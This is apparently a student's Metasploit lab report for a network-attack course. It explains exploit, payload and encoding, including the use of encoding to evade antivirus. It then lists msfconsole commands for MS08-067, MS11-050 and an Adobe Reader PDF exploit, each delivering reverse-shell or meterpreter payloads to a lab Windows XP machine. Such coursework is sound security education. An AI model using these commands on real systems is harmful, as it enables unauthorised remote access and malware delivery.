20145225唐振遠《网络对抗》Exp5 MSF基础应用
基础问题回答
- 用自己的话解释什么是
exploit
,payload
,encode
?exploit
就相当于是载具,将真正要负责攻击的代码传送到靶机中,我觉得老师上课举的火箭和卫星的例子非常形象,火箭只是运载工具,它把卫星送入轨道就完成了它的任务,exploit
的功能就和火箭差不多。payload
也就相当于载荷,实际上就是之前我们实验中做到的shellcode
,exploit
把它传送到靶机中后,它就负责执行相应的攻击代码。encode
也就是编码,它主要是为了避免之前的payload
中出现坏字符,从而影响payload
的功能,其次是为了实现免杀,不让杀毒软件很轻易的就发现payload
是攻击代码。
实践过程记录
MS08_067漏洞渗透攻击(主动攻击)
- 使用
winXPenSP3
为靶机; - 首先得确保两台机子在同一网段内
- 终端中打开
msfconsole
,输入命令use exploit/windows/smb/ms08_067_netapi
,使用MS08_067漏洞模块; - 使用命令
set payload generic/shell_reverse_tcp
指定攻击有效载荷; - 设置具体参数:
set LHOST Kali的IP
和set RHOST Windows的IP
; show options
查看所有参数是否设置正确,最后下令发起攻击exploit
:
MS11050安全漏洞(IE浏览器渗透攻击)
- 终端中打开
msfconsole
,输入命令use windows/browser/ms11_050_mshtml_cobjectelement
,使用MS11050漏洞模块; - 使用命令
set payload windows/meterpreter/reverse_tcp
指定攻击有效载荷; - 设置具体参数:
set LHOST Kali的IP
、set LPORT 自定义端口号
和set URIPATH 自定义域名
; show options
查看所有参数是否设置正确,最后下令发起攻击exploit
:-
Adobe阅读器渗透攻击(针对客户端)
- 终端中打开
msfconsole
,输入命令use exploit/windows/fileformat/adobe_cooltype_sing
,使用Adobe阅读器漏洞模块; - 使用命令
set payload windows/meterpreter/reverse_tcp
指定攻击有效载荷; - 设置具体参数:
set FILENAME 自定义文件名.pdf
、set LHOST Kali的IP
和set LPORT 自定义端口号
; show options
查看所有参数是否设置正确,最后输入exploit
,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里;
辅助模块的应用:scanner/http/dir_listing
通过上面三个实验不难看出msf的使用还是有套路可循的:进入模块
->指定荷载
->设置参数
->发动攻击
;
posted on 2017-04-16 23:06 20145225唐振远 阅读(162) 评论(0) 编辑 收藏 举报